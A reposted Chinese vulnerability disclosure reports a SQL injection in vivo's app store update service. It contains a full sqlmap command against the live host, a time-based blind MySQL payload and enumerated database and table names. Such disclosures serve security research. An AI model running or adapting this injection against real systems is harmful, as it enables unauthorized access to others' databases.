神刀安全网

漏洞标题: vivo应用商店又一处SQL注入(从哪里跌倒从哪里爬起来 )

漏洞详情

披露状态:

2016-04-06: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

。。忽略

详细说明:

code 区域
python sqlmap.py -u "http://update.appstore.vivo.com.cn/port/packages_update/" --data "nt=WIFI&model=vivo+X5Max%2B&packages=com.tencent.mm%7C760%7C%2Ccom.vlife.vivo.wallpaper%7C559%7C%2Ccn.wps.moffice_eng%7C149%7C%2Cnet.openvpn.openvpn%7C74%7C%2Ccom.naver.linewebtoon%7C151101%7C%2Ccom.qiyi.video%7C88%7C%2Ccom.baidu.BaiduMap%7C740%7C%2Ccom.dmm.games.touken%7C32%7C%2Ccom.baidu.appsearch%7C16787600%7C%2Ccom.easyovpn.easyovpn%7C150827263%7C%2Ccom.tudou.android%7C65%7C%2Ccom.windfindtech.ishanghai%7C22%7C%2Ccom.tencent.mobileqq%7C348%7C%2Ccom.huati%7C20141238%7C%2Ccom.google.android.syncadapters.calendar%7C16%7C%2Ccom.sankuai.meituan%7C361%7C%2Ckvpioneer.safecenter%7C6%7C%2Ccom.taobao.taobao%7C131%7C%2Ccom.bbk.appstore%7C622%7C%2Ccom.vivo.game%7C38%7C%2Ccom.vivo.browser%7C4420%7C%2Ccom.android.browser%7C59999%7C%2Ccom.chaozh.iReader%7C431%7C%2Ccom.vivo.space%7C13%7C&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4&dbversion=0&s=2%7C4273816697"

code 区域
---
Parameter: an (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: nt=WIFI&model=vivo X5Max+&packages=com.tencent.mm|760|,com.vlife.vivo.wallpaper|559|,cn.wps.moffice_eng|149|,net.openvpn.openvpn|74|,com.naver.linewebtoon|151101|,com.qiyi.video|88|,com.baidu.BaiduMap|740|,com.dmm.games.touken|32|,com.baidu.appsearch|16787600|,com.easyovpn.easyovpn|150827263|,com.tudou.android|65|,com.windfindtech.ishanghai|22|,com.tencent.mobileqq|348|,com.huati|20141238|,com.google.android.syncadapters.calendar|16|,com.sankuai.meituan|361|,kvpioneer.safecenter|6|,com.taobao.taobao|131|,com.bbk.appstore|622|,com.vivo.game|38|,com.vivo.browser|4420|,com.android.browser|59999|,com.chaozh.iReader|431|,com.vivo.space|13|&density=3.0&screensize=1080_1920&imei=867404020999500&at=1459861062590&n=2&app_version=622&av=19&cs=0&u=-323977978&pictype=webp&elapsedtime=125452006&an=4.4.4' AND (SELECT * FROM (SELECT(SLEEP(5)))ghSA) AND 'LGGj'='LGGj&dbversion=0&s=2|4273816697
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] appcontent
[*] information_schema
[*] test

漏洞证明:

code 区域
Database: appcontent
[23 tables]
+-----------------------------+
| :ec_manual_catch_apk |
| comment_tmp |
| t_ac_apk_url |
| t_ac_app_info |
| t_ac_app_info_all |
| t_ac_app_info_hot |
| t_ac_app_s |
| t_ac_app_screenshot |
| t_ac_fail_catch_app |
| t_ac_manual_update_apk |
| t_ac_single_download |
| t_ac_spider_detail_q |
| t_ac_spider_detail_template |
| t_ac_spider_list_task |
| t_ac_spider_list_template |
| t_ac_wdj_icon |
| t_activity_info |
| t_ad_app |
| t_ad_click |
| t_ad_icon |
| t_ad_info |
| t_android_permission |
| t_apk_delete |
+-----------------------------+

修复方案:

版权声明:转载请注明来源 sauce@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: vivo应用商店又一处SQL注入(从哪里跌倒从哪里爬起来 )

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮